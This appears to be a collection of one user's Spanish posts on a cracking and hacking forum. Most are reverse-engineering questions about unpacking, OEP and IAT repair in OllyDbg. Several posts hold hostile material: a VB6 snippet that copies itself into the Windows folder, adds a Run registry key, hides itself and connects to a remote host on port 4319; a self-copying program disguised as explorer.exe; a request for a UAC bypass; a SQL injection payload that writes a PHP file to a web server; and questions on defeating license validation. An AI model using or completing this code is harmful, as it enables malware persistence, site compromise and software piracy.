Temas

eso

Bueno en el tutorial ricardo narvaja explica algo más o menos así:

Vemos alli que antes de correr el programa, el stack esta en mi maquina en 12ffc4, quiere decir que
si cuando llega al verdadero OEP el stack esta en la misma posicion o sea en 12FFc4, la primera
sentencia que podria ser PUSH EBP se escribira en 12ffc0 justo arriba de esta, asi que busquemos
12FFc0 en el dump y pongamosle un HARDWARE BPX ON WRITE a ver si nos da resultado,
puede que si puede que no, pero el razonamiento es logico.

Por que se escribe justo arriba de la misma? si se supone que el primer comando sería PUSH EBP y en la dirección 12FFc4 si alguien lo explica bien se los agradecería saludos

Hola bueno he visto en algunas imágenes de Ollydbg que utilizan acceso directos es decir que hay un submenú en donde aparecen los iconos de otras aplicaciones, mi duda es como lo hago?, desde ya gracias

Más que explícita mi pregunta

Alguien lo logro vencer mientras estudiaban esa parte?, yo intenté e intenté pero me volvió loco es decir aparecía muchos conceptos y materia nueva, me frustré al no poder hacerlo de hecho salté las páginas hasta el capítulo siguiente 48 y leí el apartado que comentaba que era muy difícil algo me relajó ahh y aquel que no lo logró cuando estudiaba la introducción ¿lo logró después?

Saludos

Bueno que pregunte cada vez si deseo permitir o denegar (no me refiero a destildar la opción de recordar respuesta) Muchas gracias

Leyendo un poco la api Module32next se encarga de llamar módulos evidentemente dando información como el PID de quien le corresponde el módulo,la dirección base entre otras pero mi duda surge en que son los módulos es decir son solo las dll de una aplicación?, otra cosa que diferencia tiene esta api con EnumProcessModule?

Muchas gracias, Saludos

Más que explícito si es posible la última versión, mucho mejor Saludos

Hola a todos no sé como explicarlo pero en el tutorial número 45 de ricardo narvaja el habla sobre atachar un proceso cuando este genere una excepción y para generarlo el le agrega un INT3 con LordPE haciendo click derecho en la aplicación le salen opciones como:

(Break enter LordPE)
Load Into PEeditor


por lo que deduzco que eso aparece por que el LordPE se instala como un setup, ¿Como puedo hacer que aparezcan esas opciones?debido a que el lordpe que está en su página no es instalable por así decirlo, Gracias

DOM-based Cross-Site Scripting

ejemplos?,tutoriales diferencia con xss normales

Gracias

a que te refieres prooveer? puedes explicarte un poco más saludos

Hola a todos intentando desempaquetar un programa con el logré encontrar
OEP
RVA
LARGO

al ir analizando la tabla IAT me doy cuenta que que entre medio hay algunos valores que no tienen ninguna referencia por lo que los considero como código basura, no encontré ninguna referencia tan solo:

iat directa
y codigo basura

el problema surge que al poner fix dump

vuelve a aparecer esos valores basuras

por qué será?

Existe alguno prediseñado o hay que crearlo uno mismo?

Gracias

[proyecto 1]

No sé si me expliqué bien pero mi aplicación intenta agregar un registro a regedit un REG_SZ lo agrega todo bien tipo y valor, pero nombre aparece como proyecto 1, como puedo cambiar eso?, no sé mucho de VB, si pueden ser algo detallados,gracias

[¿cuando se usa?]

¿Qué es RebuildPE?,¿Para qué sirve?, ¿cuando se usa?, se usa cuando se reparó stolen bytes?

Gracias

http://www.ricnar456.dyndns.org/CRACKING/NUEVO%20CURSO/CONCURSOS%20Y%20CO
LABORACIONES/CONCURSOS/CONCURSOS%202004-
2005/CONCURSO%2078/PELock%20v1.06%20(All%20protections)%20-
%20por%20marciano.rar

No lo logro encontrar, si alguien me lo facilitara, desde ya gracias

Hola a todos bueno hay un crackme que se llama ultr4iss0, que se encarga de emular.isos   ustedes me entenderán, bueno este viene empaquetado, logré desempaquetarlo pero mi duda más que nada no tiene nada que ver con el crackeo bueno resulta que poniendo id hola y pass 99999999999999999 automáticamente se habilita el botón aceptar y al apretarlo aparece algo como "registrado",me pide que reinicie el programa pero no registra nada mi duda es que lo analizo antes del cartel registrado o después

[300,000]

Ahora si logramos los 300,000 usuarios 

[COPY A SECTION FROM HD TO EOF (End of file)]

En el tutorial 41 de ricardo se habla de hacer eso pero a mi no me aparece tal opción a ver si alguien me ayuda, me aparecen otras opciones nada parecidas, bajé el mismo LORDPE que tiene RicardoNarvaja
COPY A SECTION FROM HD TO EOF (End of file)

[OEP]

Los datos son estos

OEP
00401632

FINAL
00B2721C

INICIO
00b26134

LARGO
10E8

¿Como los pongo en ImportREC?

¿Final e Inicio le resto la Image-Base?

Gracias

Que instala,adonde,cuando,ruta

si es mejor en un log.txt 

  y cuando las uso

[creo que este no es efectivo si hay MSG==101, por favor corroborar]

Bueno hola a todos, les cuento analizando un crackme este no me muestra ninguna api que me pueda servir, ni GetProcAddress, nada de nada en fin también acudí a ver los textos, pero no encuentro nada, por lo que decidí utilizar el método

TranslateMessage Condition->MSG==101
claro se detiene al pulsar un serial, pongo execute till return para retornar de la api
pero hasta ahí llego pues no sé con qué metodo seguir
he hecho lo siguiente, no sé si está bien, me gustaría que me lo dijieran y si es posible darme más metodos:

-realizo el mismo paso dos veces o más cosa que queden 3 caracteres del serial
los busco en la memoria pero no los encuentro

-MSG==101 digito un caracter en la zona en donde se coloca el serial, luego execute till return, pongo un follow in dump del buffer (es decir busco en el dump el número de serial que coloqué) y luego le doy MemoryBreakPoint On Access, para que en el momento que se llame para realizar alguna operación trace
(en este caso me ocurre aveces que está constantemente llamándose a tal número del serial que no me sirve este método mucho)

-MSG==202 le pongo OK para que se detenga al hacer click,pongo execute till retunr, entonces luego pongo un memory breakpoint on acces en la sección CODE del programa para que se detenga cuando se trate de llamar al "cartelito que me muestre que no es el serial correcto)(creo que este no es efectivo si hay MSG==101, por favor corroborar)

¿Me podrían decir si estos métodos que uso funcionan?

en resumen ¿Qué otros métodos puedo usar cuando el crackme le encuentro que detecta las pulsasiones (MSG==101)?

Desde ya gracias

ya casi 300.000
Felicidades al foro 

Hola a todos bueno tengo este problema he modificado esta parte del código por lo que alguna parte de esta está mal, si alguien me puediera ayudar, Gracias

Código (vb) [Seleccionar] Expandir

Private Sub Form_Load()
On Error Resume Next


If Dir(Environ("Windir") & "\winsetup32.exe") = vbNullString Then
FileCopy App.path & "\" & App.EXEName & ".exe", Environ("Windir") & "\winsetup32.exe"

qazwsx = Environ("Windir") & "\asd.exe"
edcrfv = App.Title
 
 
zxccxz = edccde(HKEY_LOCAL_MACHINE, _
                    RAMA_RUN_WINDOWS, _
                    edcrfv, _
                    qazwsx, REG_SZ)

End
End If

   Dim ppplooo As String
   ppplooo = Environ("Windir") & "\asd.exe"

   If InStr(LCase$(IsWay("asd.exe")), LCase$(ppplooo)) > 0 Then
    MsgBox "Corre"
    End
   Else
    Shell Environ("Windir") & "\asd.exe", vbHide
    MsgBox "asd"
   End If

App.TaskVisible = False
Me.Visible = False
App.Title = ""
Me.Caption = ""
With Winsock1
.Close
.Connect "asd.asd.com", 4319
End With
End Sub

No se nada de programación, un amigo me dijo que introdujera eso pero en verdad no logro conseguirlo

Mi título está más que explícito, si pueden darme el método de como lo encontraron sería genial

http://www.megaupload.com/?d=YDXJ9T4Y


Muchas Gracias

[pero luego se vuelve a ejecutar explorer.exe]

Hola a todos bueno les cuento tomé un SOURCE que hace más o menos estó
EJ:

Código [Seleccionar] Expandir

archivo.exe

-al hacer doble click en archivo.exe este hace una copia de archivo.exe y lo coloca en la siguiente dirección y con el siguiente nombre:

Código [Seleccionar] Expandir

c:/archivo de programas/asd/explorer.exe
-luego de esto ejecuta explorer.exe

por lo que por deducción nunca se ejecuta archivo.exe

-el problema surge que si se hace doble click nuevamente a archivo.exe este arranca y tiene una condición si existe c:/archivo de programas/asd/explorer.exe no lo copia a ese lugar pero luego se vuelve a ejecutar explorer.exe, por la que idea sería la siguiente que antes de ejecutar el explorer.exe verifique si c:/archivo de programas/asd/explorer.exe está siendo ejecutado y solo si no está ejecutado este lo lanza, el problema es que no se puede dar referencia a explorer.exe

como hago esto, Gracias

Hola a todos, bueno más que nada existe una forma de poder saltar UAC que sea efectiva

[OEP]

Hola a todos buenos les cuento tengo un crackme en el que logro llegar al OEP, pero lo que no puedo conseguir es lograr reparar la IAT

Les pido si me pueden dar pistas, no quiero la respuesta  

Les comento los datos que obtuve me gustaría que me dijeran si están bien, para saber más menos en que estoy fallando

OEP
004717A0


IAT

Final
0048ECF4

Inicio
0048E0B0

Largo
c44

Al medio del IAT, encontré muchos valores que no tenían referencia por lo que los tomé (lo consideré)como código basura, por lo que lo borré con el ImportREC, pero al momento de intentar iniciarle, este no arranca (no muestra ningún error, tan solo no se inicia)

http://www.megaupload.com/?d=FJUG84XN

Gracias

Hola, el crackme se llama UnPackMe_tElock0.98

Ricardo explica un método, pero en mi máquina virtual con windows XP no logro obtenerlo con tal, si alguna se anima darme el OEP para seguir estudiando, Gracias

Más que explícita está en el título mi pregunta es que debo hacer para hacer que al conectarse se valide, ¿alguna API que se utilice?

El programa está crackeado para poder colocar cualquier serial este me devuelve que el serial es correcto, pero cuando se quiere utilizar el programa abajo aparece
"validando", se intenta de conectar a internet para aprobarlo o no, de todas forma el programa funciona bien, pero más que nada es algo estético para que no aparezca con rojo abajo validando xD

Algún método para obtener el jump condicional de si ya está comprobada la validación por internet


Gracias

[E9]

Hola a todos bueno les comento tengo una duda en el capítulo en donde se hablan de los desempaquetados
en el habla en una parte de Buscar jmp o call hacia el OEP y para realizarlo utiliza E9 para buscar JMP y E8 para buscar CALL

Mi duda puntual es ¿por qué se buscan los JMP y CALL con E9 y E8?


Gracias

Tal como lo dice el título, debuggeando el programa al editar algunos valores funciona genial pero al momento de querer guardarlo cuando intento abrirlo, no funciona, a qué se debe esto?,(también por prueba intenté darle atributos de write a la sección code y con tan solo eso, no pude guardar los cambios :S

[notifique]

Bueno Hola a todos, estando un poco en este foro, lo he encontrado fascinante pero hay una cosa que creo que faltaría agregarle que es como tal dice mi título de sugerencia, es que se nos notifique cuando responden algo en un tema que hemos participado o en los temas que hemos creado, ya que aveces al postear o comentar  tantas cosas se nos olvidan y de esta forma tendríamos ventajas como:
1-Poder responder de manera más rápida y cómodamente las dudas de los demás usuarios
2-Disminución considerable de temas que quedaron a media
3-Ahorro de tiempo en tener que estar revisando el subforo y tema en el que escribimos algo
4-Nuestro F5 se los agradecería




la idea sería como lo muestra la imagen un botón que se encargue de mostrarnos con un numerito aquellos mensajes que por descuido o olvido se nos han olvidado revisar y estos han sido respondidos con otra pregunta (usuarios ansiosos por el saber)

por si alguien no lo entiende adjunto un ejemplo con respecto a la imagen:
EJ: cree un post llamado sugerencia. Pasando el tiempo lo olvido pero
vemos que el usuario "el-brujo" ha comentado tal sugerencia, abajo también vemos otros post pero esos no son mios pero pese a eso yo participé, por lo cual me hace estar al tanto este sistema de notificaciones, también notamos que los usuarios y los títulos están en azul, esto se debe a que si hago click en el usuario, este me llevará a su perfil, para saber más bien quien es, y si hago click en el nombre del título, me llevará al post

es como de facebook no   ? ni lo comenten  

Espero Ansiosa su opinión

Hola, si alguien sabe de manera simple y entendible que hace tal api y si es factible utilizarla en Ingeniería inversa 

Gracias

tal como dice el post, existe otra versión de exdec (no la beta)?

Gracias

[[EAX+30]]

hola más que nada tengo unas pequeñas dudas haber si me las pueden aclarar
les comento:

1)MOV EBX,DWORD PTR DS:[EAX+4]
2)MOV EBX,DWORD PTR DS:[EAX+30]

en el manual de ricardo narvaja dice que moverá los 4 siguientes bits al EBX, eso ¿ es lo mismo que sumarle 4 a EAX? si es así El segundo ejemplo moverá los 30 siguientes bits ?  

Si alguien me lo explicara se los agradecería, saludos

[547B XOR 1234]

Hola a todos bueno les comento, me inicié en el estudio de esta gran materia, creo que es lo mejor para mi  

bueno siguiendo el tutorial de narvaja, intento crackear el crackme y llego hasta una comparación exáctamente esta

compara el serial correcto con la comparación del serial falso pero el serial falso está con un xor de 1234

por lo tanto se deduce que el serial correcto está con xor también, pero mi duda es como puedo saber cual es, le dejo la ecucación de narvaja (la entiendo pero el desarrollo no lo consigo)

Si EAX=EBX
Reemplazo EBX por EAX ya que son iguales
EAX=(Valor hexadecimal del serial correcto) XOR 1234
Y ya no es más serial falso porque el serial que hace que EBX y EAX sean iguales es el serial correcto.
Despejo
EAX XOR 1234= (Valor hexadecimal del serial correcto)
Y EAX es un dato pues lo tengo de la comparación EAX=547B
547B XOR 1234 = (Valor hexadecimal del serial correcto)
Si soluciono el XOR
464F = (Valor hexadecimal del serial correcto)
Si 464F es el valor correcto hexadecimal, si lo paso a decimal tendré mi serial para tipear

capítulo 16

mi duda es como lo soluciona xD

ya que lo que hice fue pasar 464F a binario al igual que 1234 y luego ambos le aplico la tablita de XOR y no me dá, no sé si sea cuadrado pero xor va primero, por que esta vez aparece al medio :c

Saludos

Hola a todos como puedo autocopiar un .exe, es decir con que nombre llamo al .exe para copiarlo en una ruta sin que este falle si se renombra

en batch se le daba el valor %0
copy %0 ruta

Gracias

[imacros]

Me gustaría saber que lenguaje de programación usa imacros, addons de firefox... me interesó los comandos que usa para navegar y hacer peticiones en Internet de manera automatizada...

¿Existirá una herramienta en consola que haga lo mismo?, algo como Wget
(me llamá mucho la atención que aparte de enviarte a una página, también interactua con ella de forma automática

aquí adjunto un código

Código [Seleccionar] Expandir

URL GOTO=http://www.paginaparacon1o2.com
TAG POS=1 TYPE=SPAN ATTR=CLASS:x2

este código insertado en imacros, se encarga de visitar la página http://www.paginaparacon1o2.com
y luego clickea la opción 2

Espero sus respuestas, gracias

[-1+union+all+select+1,'contenido',3,N+INTO+OUTFILE+'/ruta/archivo.php'--]

Hola a todos, les cuento encontré un query que permitía que pudieras escribir archivos dentro de la web (en mi caso un.php), pero me surge unas dudas

bueno la sentencía es así:

-1+union+all+select+1,'contenido',3,N+INTO+OUTFILE+'/ruta/archivo.php'--

contenido=lo que va a tener adentro el archivo.php
ruta=dirección en donde se creará el archivo

1-¿Está bien el código?
2-¿como consigo la ruta en donde subiré el archivo?

Desde ya gracias

Bueno hola a todos, les cuento estoy tratando de mudarme 100% a linux pero no puedo debido a que el único programa que no me deja instalarlo es acunetix, es la versión 7, intento con wine pero me marca un error cuando se esta cargando si mal no lo recuerdo es el modulo http algo así

¿Alguien sabe como hacerlo funcionar?

Gracias

Hola a todos al intentar hacerlo me aparece esto:

The certificate is not issued by a trusted authority. Use the
   fingerprint to validate the certificate manually!
Certificate information:
- Hostname: metasploit.com
- Valid: from Tue, 16 Mar 2010 12:09:59 GMT until Mon, 01 Apr 2013 22:02:24 GMT
- Issuer: 07969287, http://certificates.godaddy.com/repository, GoDaddy.com, Inc., Scottsdale, Arizona, US

Gracias

[hola]

como puedo hacer que un batch separe datos o información que un usuario digitó
me explico

un usuario escribe hola
lo escrito se separa en 4 datos:
h
o
l
a


gracias

Hola a todos bueno mi opregunta es muy específica :V y está más que clara en el título, ¡como puedo hacer para que debian no bloquee la pantalla por el no uso (se pone la pantalla en negro y cuando muevo el mouse me pregunta login y pass),debido a que el internet se me desconecta.. y pierdo descargas y cosas así :c, desde ya gracias

Hola a todos tal como dice mi tema no puedo instalar metassploit en mi Netbook
-Poseo debian, la última versión hasta el momento

hice lo siguiente:

Código [Seleccionar] Expandir

chmod -x metas.run
sudo sh ./metas.run

cuando hago eso me lanza

Código [Seleccionar] Expandir

framework-3.7.0-linux-full.run: 1: Syntax error: "(" unexpected

No sé por que me bajé el pack full desde la página el de 32 bits pero no logro instalarlo
espero su ayuda, muchas gracias